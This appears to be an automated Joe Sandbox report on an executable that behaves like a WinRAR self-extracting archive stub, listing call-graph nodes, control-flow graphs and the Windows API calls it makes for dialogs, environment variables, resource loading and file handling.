50e177 24915->24917 24918 50e189 24915->24918 24916->24915 25129 50dc3b 6 API calls 24917->25129 25125 50ac7c 24918->25125 24920 50e17d CloseHandle 24920->24918 24922 50e1c3 24927 50f993 GetModuleHandleW 24922->24927 25259 517cd5 24923->25259 24926->24841 24927->24851 24928->24853 24929->24856 24930->24831 24932->24860 24945 513b07 24933->24945 24936 512a67 24936->24862 24938 512a6f 24939 512a7a 24938->24939 24959 513b43 DeleteCriticalSection 24938->24959 24939->24862 24988 51c05a 24941->24988 24944 512a7d 7 API calls 2 library calls 24944->24863 24947 513b10 24945->24947 24948 513b39 24947->24948 24949 512a63 24947->24949 24960 513d46 24947->24960 24965 513b43 DeleteCriticalSection 24948->24965 24949->24936 24951 512b8c 24949->24951 24981 513c57 24951->24981 24955 512baf 24956 512bbc 24955->24956 24987 512bbf 6 API calls ___vcrt_FlsFree 24955->24987 24956->24938 24958 512ba1 24958->24938 24959->24936 24966 513c0d 24960->24966 24963 513d7e InitializeCriticalSectionAndSpinCount 24964 513d69 24963->24964 24964->24947 24965->24949 24967 513c26 24966->24967 24971 513c4f 24966->24971 24967->24971 24973 513b72 24967->24973 24970 513c3b GetProcAddress 24970->24971 24972 513c49 24970->24972 24971->24963 24971->24964 24972->24971 24978 513b7e ___vcrt_FlsSetValue 24973->24978 24974 513bf3 24974->24970 24974->24971 24975 513b95 LoadLibraryExW 24976 513bb3 GetLastError 24975->24976 24977 513bfa 24975->24977 24976->24978 24977->24974 24979 513c02 FreeLibrary 24977->24979 24978->24974 24978->24975 24980 513bd5 LoadLibraryExW 24978->24980 24979->24974 24980->24977 24980->24978 24982 513c0d ___vcrt_FlsSetValue 5 API calls 24981->24982 24983 513c71 24982->24983 24984 513c8a TlsAlloc 24983->24984 24985 512b96 24983->24985 24985->24958 24986 513d08 6 API calls ___vcrt_FlsSetValue 24985->24986 24986->24955 24987->24958 24989 51c077 24988->24989 24992 51c073 24988->24992 24989->24992 24994 51a6a0 24989->24994 24990 50fbbc CatchGuardHandler 5 API calls 24991 50eefe 24990->24991 24991->24866 24991->24944 24992->24990 24995 51a6ac ___scrt_is_nonwritable_in_current_image 24994->24995 25006 51ac31 EnterCriticalSection 24995->25006 24997 51a6b3 25007 51c528 24997->25007 24999 51a6c2 25000 51a6d1 24999->25000 25020 51a529 29 API calls 24999->25020 25022 51a6ed LeaveCriticalSection _abort 25000->25022 25003 51a6cc 25021 51a5df GetStdHandle GetFileType 25003->25021 25004 51a6e2 _abort 25004->24989 25006->24997 25008 51c534 ___scrt_is_nonwritable_in_current_image 25007->25008 25009 51c541 25008->25009 25010 51c558 25008->25010 25031 5191a8 20 API calls _abort 25009->25031 25023 51ac31 EnterCriticalSection 25010->25023 25013 51c546 25032 519087 26 API calls _abort 25013->25032 25015 51c590 25033 51c5b7 LeaveCriticalSection _abort 25015->25033 25016 51c550 _abort 25016->24999 25019 51c564 25019->25015 25024 51c479 25019->25024 25020->25003 25021->25000 25022->25004 25023->25019 25025 51b136 _abort 20 API calls 25024->25025 25026 51c48b 25025->25026 25028 51af0a 11 API calls 25026->25028 25030 51c498 25026->25030 25027 518dcc _free 20 API calls 25029 51c4ea 25027->25029 25028->25026 25029->25019 25030->25027 25031->25013 25032->25016 25033->25016 25035 50ec50 25034->25035 25036 50086d GetModuleHandleW 25035->25036 25037 5008e7 25036->25037 25038 500888 GetProcAddress 25036->25038 25039 500c14 GetModuleFileNameW 25037->25039 25139 5175fb 42 API calls 2 library calls 25037->25139 25040 5008a1 25038->25040 25041 5008b9 GetProcAddress 25038->25041 25043 500c32 25039->25043 25040->25041 25046 5008cb 25041->25046 25053 500c94 GetFileAttributesW 25043->25053 25055 500c5d CompareStringW 25043->25055 25056 500cac 25043->25056 25130 4fb146 25043->25130 25133 50081b 25043->25133 25044 500b54 25044->25039 25045 500b5f GetModuleFileNameW CreateFileW 25044->25045 25047 500c08 CloseHandle 25045->25047 25048 500b8f SetFilePointer 25045->25048 25046->25037 25047->25039 25048->25047 25049 500b9d ReadFile 25048->25049 25049->25047 25052 500bbb 25049->25052 25052->25047 25054 50081b 2 API calls 25052->25054 25053->25043 25053->25056 25054->25052 25055->25043 25057 500cb7 25056->25057 25060 500cec 25056->25060 25059 500cd0 GetFileAttributesW 25057->25059 25061 500ce8 25057->25061 25058 500dfb 25082 50a64d GetCurrentDirectoryW 25058->25082 25059->25057 25059->25061 25060->25058 25062 4fb146 GetVersionExW 25060->25062 25061->25060 25063 500d06 25062->25063 25064 500d73 25063->25064 25065 500d0d 25063->25065 25066 4f4092 _swprintf 51 API calls 25064->25066 25067 50081b 2 API calls 25065->25067 25069 500d9b AllocConsole 25066->25069 25068 500d17 25067->25068 25070 50081b 2 API calls 25068->25070 25071 500df3 ExitProcess 25069->25071 25072 500da8 GetCurrentProcessId AttachConsole 25069->25072 25073 500d21 25070->25073 25140 513e13 25072->25140 25076 4fe617 53 API calls 25073->25076 25075 500dc9 GetStdHandle WriteConsoleW Sleep FreeConsole 25075->25071 25077 500d3c 25076->25077 25078 4f4092 _swprintf 51 API calls 25077->25078 25079 500d4f 25078->25079 25080 4fe617 53 API calls 25079->25080 25081 500d5e 25080->25081 25081->25071 25082->24882 25084 50081b 2 API calls 25083->25084 25085 50ac2a OleInitialize 25084->25085 25086 50ac4d GdiplusStartup SHGetMalloc 25085->25086 25086->24884 25088 50c5ce 25087->25088 25089 50c6e4 25088->25089 25090 501fac CharUpperW 25088->25090 25142 4ff3fa 82 API calls 2 library calls 25088->25142 25089->24893 25089->24894 25090->25088 25093 50ec50 25092->25093 25094 50dbeb SetEnvironmentVariableW 25093->25094 25096 50dc0e 25094->25096 25095 50dc36 25095->24886 25096->25095 25097 50dc2a SetEnvironmentVariableW 25096->25097 25097->25095 25099 50b70b GetObjectW 25098->25099 25100 50b6fe 25098->25100 25102 50b71a 25099->25102 25143 50a6c2 FindResourceW 25100->25143 25104 50a5c6 4 API calls 25102->25104 25105 50b72d 25104->25105 25106 50b770 25105->25106 25107 50b74c 25105->25107 25109 50a6c2 12 API calls 25105->25109 25117 4fda42 25106->25117 25157 50a605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 25107->25157 25111 50b73d 25109->25111 25110 50b754 25158 50a5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 25110->25158 25111->25107 25113 50b743 DeleteObject 25111->25113 25113->25107 25114 50b75d 25159 50a80c 8 API calls 25114->25159 25116 50b764 DeleteObject 25116->25106 25168 4fda67 25117->25168 25122 5090b7 25123 50eb38 8 API calls 25122->25123 25124 5090d6 25123->25124 25124->24906 25126 50acab GdiplusShutdown CoUninitialize 25125->25126 25126->24922 25128->24914 25129->24920 25131 4fb15a GetVersionExW 25130->25131 25132 4fb196 25130->25132 25131->25132 25132->25043 25134 50ec50 25133->25134 25135 500828 GetSystemDirectoryW 25134->25135 25136 500840 25135->25136 25137 50085e 25135->25137 25138 500851 LoadLibraryW 25136->25138 25137->25043 25138->25137 25139->25044 25141 513e1b 25140->25141 25141->25075 25141->25141 25142->25088 25144 50a6e5 SizeofResource 25143->25144 25145 50a7d3 25143->25145 25144->25145 25146 50a6fc LoadResource 25144->25146 25145->25099 25145->25102 25146->25145 25147 50a711 LockResource 25146->25147 25147->25145 25148 50a722 GlobalAlloc 25147->25148 25148->25145 25149 50a73d GlobalLock 25148->25149 25150 50a7cc GlobalFree 25149->25150 25151 50a74c __InternalCxxFrameHandler 25149->25151 25150->25145 25152 50a7c5 GlobalUnlock 25151->25152 25160 50a626 GdipAlloc 25151->25160 25152->25150 25155 50a7b0 25155->25152 25156 50a79a GdipCreateHBITMAPFromBitmap 25156->25155 25157->25110 25158->25114 25159->25116 25161 50a638 25160->25161 25163 50a645 25160->25163 25164 50a3b9 25161->25164 25163->25152 25163->25155 25163->25156 25165 50a3e1 GdipCreateBitmapFromStream 25164->25165 25166 50a3da GdipCreateBitmapFromStreamICM 25164->25166 25167 50a3e6 25165->25167 25166->25167 25167->25163 25169 4fda75 _wcschr __EH_prolog 25168->25169 25170 4fdaa4 GetModuleFileNameW 25169->25170 25171 4fdad5 25169->25171 25172 4fdabe 25170->25172 25214 4f98e0 25171->25214 25172->25171 25174 4fdb31 25225 516310 25174->25225 25175 4f959a 80 API calls 25177 4fda4e 25175->25177 25176 4fe261 78 API calls 25179 4fdb05 25176->25179 25212 4fe29e GetModuleHandleW FindResourceW 25177->25212 25179->25174 25179->25176 25192 4fdd4a 25179->25192 25180 4fdb44 25181 516310 26 API calls 25180->25181 25189 4fdb56 ___vcrt_FlsSetValue 25181->25189 25182 4fdc85 25182->25192 25245 4f9d70 81 API calls 25182->25245 25184 4f9e80 79 API calls 25184->25189 25186 4fdc9f ___std_exception_copy 25187 4f9bd0 82 API calls 25186->25187 25186->25192 25190 4fdcc8 ___std_exception_copy 25187->25190 25189->25182 25189->25184 25189->25192 25239 4f9bd0 25189->25239 25244 4f9d70 81 API calls 25189->25244 25190->25192 25210 4fdcd3 ___vcrt_FlsSetValue _wcslen ___std_exception_copy 25190->25210 25246 501b84 MultiByteToWideChar 25190->25246 25192->25175 25193 4fe159 25198 4fe1de 25193->25198 25252 518cce 26 API calls 2 library calls 25193->25252 25195 4fe16e 25253 517625 26 API calls 2 library calls 25195->25253 25197 4fe1c6 25254 4fe27c 78 API calls 25197->25254 25199 4fe214 25198->25199 25202 4fe261 78 API calls 25198->25202 25203 516310 26 API calls 25199->25203 25202->25198 25204 4fe22d 25203->25204 25205 516310 26 API calls 25204->25205 25205->25192 25208 501da7 WideCharToMultiByte 25208->25210 25210->25192 25210->25193 25210->25208 25247 4fe5b1 50 API calls __vsnprintf 25210->25247 25248 516159 26 API calls 3 library calls 25210->25248 25249 518cce 26 API calls 2 library calls 25210->25249 25250 517625 26 API calls 2 library calls 25210->25250 25251 4fe27c 78 API calls 25210->25251 25213 4fda55 25212->25213 25213->25122 25216 4f98ea 25214->25216 25215 4f994b CreateFileW 25217 4f996c GetLastError 25215->25217 25220 4f99bb 25215->25220 25216->25215 25218 4fbb03 GetCurrentDirectoryW 25217->25218 25219 4f998c 25218->25219 25219->25220 25222 4f9990 CreateFileW GetLastError 25219->25222 25221 4f99ff 25220->25221 25223 4f99e5 SetFileTime 25220->25223 25221->25179 25222->25220 25224 4f99b5 25222->25224 25223->25221 25224->25220 25226 516349 25225->25226 25227 51634d 25226->25227 25238 516375 25226->25238 25255 5191a8 20 API calls _abort 25227->25255 25229 516699 25232 50fbbc CatchGuardHandler 5 API calls 25229->25232 25230 516352 25256 519087 26 API calls _abort 25230->25256 25234 5166a6 25232->25234 25233 51635d 25235 50fbbc CatchGuardHandler 5 API calls 25233->25235 25234->25180 25236 516369 25235->25236 25236->25180 25238->25229 25257 516230 5 API calls CatchGuardHandler 25238->25257 25240 4f9bdc 25239->25240 25242 4f9be3 25239->25242 25240->25189 25242->25240 25243 4f9785 GetStdHandle ReadFile GetLastError GetLastError GetFileType 25242->25243 25258 4f6d1a 77 API calls 25242->25258 25243->25242 25244->25189 25245->25186 25246->25210 25247->25210 25248->25210 25249->25210 25250->25210 25251->25210 25252->25195 25253->25197 25254->25198 25255->25230 25256->25233 25257->25238 25258->25242 25260 517ce1 _abort 25259->25260 25261 517ce8 25260->25261 25262 517cfa 25260->25262 25295 517e2f GetModuleHandleW 25261->25295 25283 51ac31 EnterCriticalSection 25262->25283 25265 517ced 25265->25262 25296 517e73 GetModuleHandleExW 25265->25296 25266 517d9f 25284 517ddf 25266->25284 25269 517d01 25269->25266 25271 517d76 25269->25271 25304 5187e0 20 API calls _abort 25269->25304 25273 517d8e 25271->25273 25277 518a91 _abort 5 API calls 25271->25277 25278 518a91 _abort 5 API calls 25273->25278 25274 517de8 25305 522390 5 API calls CatchGuardHandler 25274->25305 25275 517dbc 25287 517dee 25275->25287 25277->25273 25278->25266 25283->25269 25306 51ac81 LeaveCriticalSection 25284->25306 25286 517db8 25286->25274 25286->25275 25307 51b076 25287->25307 25290 517e1c 25293 517e73 _abort 8 API calls 25290->25293 25291 517dfc GetPEB 25291->25290 25292 517e0c GetCurrentProcess TerminateProcess 25291->25292 25292->25290 25294 517e24 ExitProcess 25293->25294 25295->25265 25297 517ec0 25296->25297 25298 517e9d GetProcAddress 25296->25298 25299 517ec6 FreeLibrary 25297->25299 25300 517ecf 25297->25300 25302 517eb2 25298->25302 25299->25300 25301 50fbbc CatchGuardHandler 5 API calls 25300->25301 25303 517cf9 25301->25303 25302->25297 25303->25262 25304->25271 25306->25286 25308 51b09b 25307->25308 25311 51b091 25307->25311 25309 51ac98 _abort 5 API calls 25308->25309 25309->25311 25310 50fbbc CatchGuardHandler 5 API calls 25312 517df8 25310->25312 25311->25310 25312->25290 25312->25291 25420 4f6faa 111 API calls 3 library calls 25421 501bbd GetCPInfo IsDBCSLeadByte 25422 50f3a0 27 API calls 25355 51a4a0 71 API calls _free 25356 50dca1 DialogBoxParamW 25357 5208a0 IsProcessorFeaturePresent 25383 50eda7 48 API calls _unexpected

                                                            Control-flow Graph

                                                            APIs
                                                              • Part of subcall function 00500863: GetModuleHandleW.KERNEL32(kernel32), ref: 0050087C
                                                              • Part of subcall function 00500863: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0050088E
                                                              • Part of subcall function 00500863: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 005008BF
                                                              • Part of subcall function 0050A64D: GetCurrentDirectoryW.KERNEL32(?,?), ref: 0050A655
                                                              • Part of subcall function 0050AC16: OleInitialize.OLE32(00000000), ref: 0050AC2F
                                                              • Part of subcall function 0050AC16: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0050AC66
                                                              • Part of subcall function 0050AC16: SHGetMalloc.SHELL32(00538438), ref: 0050AC70
                                                            • GetCommandLineW.KERNEL32 ref: 0050DF5C
                                                            • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 0050DF83
                                                            • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 0050DF94
                                                            • UnmapViewOfFile.KERNEL32(00000000), ref: 0050DFCE
                                                              • Part of subcall function 0050DBDE: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 0050DBF4
                                                              • Part of subcall function 0050DBDE: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0050DC30
                                                            • CloseHandle.KERNEL32(00000000), ref: 0050DFD7
                                                            • GetModuleFileNameW.KERNEL32(00000000,0054EC90,00000800), ref: 0050DFF2
                                                            • SetEnvironmentVariableW.KERNEL32(sfxname,0054EC90), ref: 0050DFFE
                                                            • GetLocalTime.KERNEL32(?), ref: 0050E009
                                                            • _swprintf.LIBCMT ref: 0050E048
                                                            • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 0050E05A
                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 0050E061
                                                            • LoadIconW.USER32(00000000,00000064), ref: 0050E078
                                                            • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001B7E0,00000000), ref: 0050E0C9
                                                            • Sleep.KERNEL32(?), ref: 0050E0F7
                                                            • DeleteObject.GDI32 ref: 0050E130
                                                            • DeleteObject.GDI32(?), ref: 0050E140
                                                            • CloseHandle.KERNEL32 ref: 0050E183
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$CommandCurrentDialogDirectoryGdiplusIconInitializeLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
                                                            • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp$xzT
                                                            • API String ID: 3049964643-944309655
                                                            • Opcode ID: fbd5e9dfa26aeb8358dbd008a7155437b271a06fcac20ebbc15e7e815feb74a5
                                                            • Instruction ID: 217b6390b1e001fa7c7c786d6c3cdd151a61110a6f28ff89035e33dc44464f0a
                                                            • Opcode Fuzzy Hash: fbd5e9dfa26aeb8358dbd008a7155437b271a06fcac20ebbc15e7e815feb74a5
                                                            • Instruction Fuzzy Hash: B361C671904345ABD320AB75EC4EF6F7FA8FFA6704F000429F545922E1EB789948D761

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 802 50a6c2-50a6df FindResourceW 803 50a6e5-50a6f6 SizeofResource 802->803 804 50a7db 802->804 803->804 806 50a6fc-50a70b LoadResource 803->806 805 50a7dd-50a7e1 804->805 806->804 807 50a711-50a71c LockResource 806->807 807->804 808 50a722-50a737 GlobalAlloc 807->808 809 50a7d3-50a7d9 808->809 810 50a73d-50a746 GlobalLock 808->810 809->805 811 50a7cc-50a7cd GlobalFree 810->811 812 50a74c-50a76a call 510320 810->812 811->809 816 50a7c5-50a7c6 GlobalUnlock 812->816 817 50a76c-50a78e call 50a626 812->817 816->811 817->816 822 50a790-50a798 817->822 823 50a7b3-50a7c1 822->823 824 50a79a-50a7ae GdipCreateHBITMAPFromBitmap 822->824 823->816 824->823 825 50a7b0 824->825 825->823
                                                            APIs
                                                            • FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,0050B73D,00000066), ref: 0050A6D5
                                                            • SizeofResource.KERNEL32(00000000,?,?,?,0050B73D,00000066), ref: 0050A6EC
                                                            • LoadResource.KERNEL32(00000000,?,?,?,0050B73D,00000066), ref: 0050A703
                                                            • LockResource.KERNEL32(00000000,?,?,?,0050B73D,00000066), ref: 0050A712
                                                            • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,0050B73D,00000066), ref: 0050A72D
                                                            • GlobalLock.KERNEL32(00000000), ref: 0050A73E
                                                            • CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 0050A762
                                                            • GlobalUnlock.KERNEL32(00000000), ref: 0050A7C6
                                                              • Part of subcall function 0050A626: GdipAlloc.GDIPLUS(00000010), ref: 0050A62C
                                                            • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 0050A7A7
                                                            • GlobalFree.KERNEL32(00000000), ref: 0050A7CD
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: Global$Resource$AllocCreateGdipLock$BitmapFindFreeFromLoadSizeofStreamUnlock
                                                            • String ID: FjunP$PNG
                                                            • API String ID: 211097158-2194318004
                                                            • Opcode ID: 9a6a0e1f367bdd2c7f92addf6ba16721d0afa65f14a8009f3db897b211178159
                                                            • Instruction ID: 3fae5d86c63c7280e09810827b70fca5f5da643f0bc2f0355a88362db33abc91
                                                            • Opcode Fuzzy Hash: 9a6a0e1f367bdd2c7f92addf6ba16721d0afa65f14a8009f3db897b211178159
                                                            • Instruction Fuzzy Hash: 5631C275600712AFD7209F21EC88D2FBFB9FF95750B044918F805822A0EB31DC5AEBA1

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1032 4fa69b-4fa6bf call 50ec50 1035 4fa727-4fa730 FindNextFileW 1032->1035 1036 4fa6c1-4fa6ce FindFirstFileW 1032->1036 1037 4fa742-4fa7ff call 500602 call 4fc310 call 5015da * 3 1035->1037 1038 4fa732-4fa740 GetLastError 1035->1038 1036->1037 1039 4fa6d0-4fa6e2 call 4fbb03 1036->1039 1043 4fa804-4fa811 1037->1043 1040 4fa719-4fa722 1038->1040 1047 4fa6fe-4fa707 GetLastError 1039->1047 1048 4fa6e4-4fa6fc FindFirstFileW 1039->1048 1040->1043 1050 4fa709-4fa70c 1047->1050 1051 4fa717 1047->1051 1048->1037 1048->1047 1050->1051 1053 4fa70e-4fa711 1050->1053 1051->1040 1053->1051 1055 4fa713-4fa715 1053->1055 1055->1040
                                                            APIs
                                                            • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,004FA592,000000FF,?,?), ref: 004FA6C4
                                                              • Part of subcall function 004FBB03: _wcslen.LIBCMT ref: 004FBB27
                                                            • FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,004FA592,000000FF,?,?), ref: 004FA6F2
                                                            • GetLastError.KERNEL32(?,?,00000800,?,?,?,?,004FA592,000000FF,?,?), ref: 004FA6FE
                                                            • FindNextFileW.KERNEL32(?,?,?,?,?,?,004FA592,000000FF,?,?), ref: 004FA728
                                                            • GetLastError.KERNEL32(?,?,?,?,004FA592,000000FF,?,?), ref: 004FA734
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: FileFind$ErrorFirstLast$Next_wcslen
                                                            • String ID:
                                                            • API String ID: 42610566-0
                                                            • Opcode ID: d3402661278f40864ea9459bcce4bc0e082b05158cedb76c96139cb026138e46
                                                            • Instruction ID: bc243ea7983c825a14c382de21db1a9f4c67d3cbe909b3384c66b42fe0b4db73
                                                            • Opcode Fuzzy Hash: d3402661278f40864ea9459bcce4bc0e082b05158cedb76c96139cb026138e46
                                                            • Instruction Fuzzy Hash: EC418372500519ABC725EF64CC88AEEB7B8FF48350F104196E95DD3240D738AEA5CF95
                                                            APIs
                                                            • GetCurrentProcess.KERNEL32(00000000,?,00517DC4,00000000,0052C300,0000000C,00517F1B,00000000,00000002,00000000), ref: 00517E0F
                                                            • TerminateProcess.KERNEL32(00000000,?,00517DC4,00000000,0052C300,0000000C,00517F1B,00000000,00000002,00000000), ref: 00517E16
                                                            • ExitProcess.KERNEL32 ref: 00517E28
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: Process$CurrentExitTerminate
                                                            • String ID:
                                                            • API String ID: 1703294689-0
                                                            • Opcode ID: a94fbeecab8954e0e037767e47d08ca98903531d046c4e9f4ba2ba10104da2bb
                                                            • Instruction ID: 8ae24d793c86f18727942c921dcec8de60146a4bb209658204aad5769d6c8094
                                                            • Opcode Fuzzy Hash: a94fbeecab8954e0e037767e47d08ca98903531d046c4e9f4ba2ba10104da2bb
                                                            • Instruction Fuzzy Hash: 86E04F31000148ABDF117F24CD0E9893FB9FF59341F004494F8058A132CB39DEA6DA90
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: H_prolog
                                                            • String ID:
                                                            • API String ID: 3519838083-0
                                                            • Opcode ID: 49dae722c29fe301e41e32b0a781006f342e38eafb6b1fe42be9e14c8c363f25
                                                            • Instruction ID: e428ce387d56033045e0c217d1cb12ca0ae52bc1c4c68608dd920dbd9fd224a7
                                                            • Opcode Fuzzy Hash: 49dae722c29fe301e41e32b0a781006f342e38eafb6b1fe42be9e14c8c363f25
                                                            • Instruction Fuzzy Hash: D0821B7090414DAEDF15DB60C895BFBBBB9AF05304F0841BFEA499F242CB385A84C769
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 0050B7E5
                                                              • Part of subcall function 004F1316: GetDlgItem.USER32(00000000,00003021), ref: 004F135A
                                                              • Part of subcall function 004F1316: SetWindowTextW.USER32(00000000,005235F4), ref: 004F1370
                                                            • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0050B8D1
                                                            • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0050B8EF
                                                            • IsDialogMessageW.USER32(?,?), ref: 0050B902
                                                            • TranslateMessage.USER32(?), ref: 0050B910
                                                            • DispatchMessageW.USER32(?), ref: 0050B91A
                                                            • GetDlgItemTextW.USER32(?,00000066,?,00000800), ref: 0050B93D
                                                            • KiUserCallbackDispatcher.NTDLL(?,00000001), ref: 0050B960
                                                            • GetDlgItem.USER32(?,00000068), ref: 0050B983
                                                            • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0050B99E
                                                            • SendMessageW.USER32(00000000,000000C2,00000000,005235F4), ref: 0050B9B1
                                                              • Part of subcall function 0050D453: _wcschr.LIBVCRUNTIME ref: 0050D45C
                                                              • Part of subcall function 0050D453: _wcslen.LIBCMT ref: 0050D47D
                                                            • SetFocus.USER32(00000000), ref: 0050B9B8
                                                            • _swprintf.LIBCMT ref: 0050BA24
                                                              • Part of subcall function 004F4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 004F40A5
                                                              • Part of subcall function 0050D4D4: GetDlgItem.USER32(00000068,0054FCB8), ref: 0050D4E8
                                                              • Part of subcall function 0050D4D4: ShowWindow.USER32(00000000,00000005,?,?,?,0050AF07,00000001,?,?,0050B7B9,0052506C,0054FCB8,0054FCB8,00001000,00000000,00000000), ref: 0050D510
                                                              • Part of subcall function 0050D4D4: SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0050D51B
                                                              • Part of subcall function 0050D4D4: SendMessageW.USER32(00000000,000000C2,00000000,005235F4), ref: 0050D529
                                                              • Part of subcall function 0050D4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0050D53F
                                                              • Part of subcall function 0050D4D4: SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 0050D559
                                                              • Part of subcall function 0050D4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0050D59D
                                                              • Part of subcall function 0050D4D4: SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 0050D5AB
                                                              • Part of subcall function 0050D4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0050D5BA
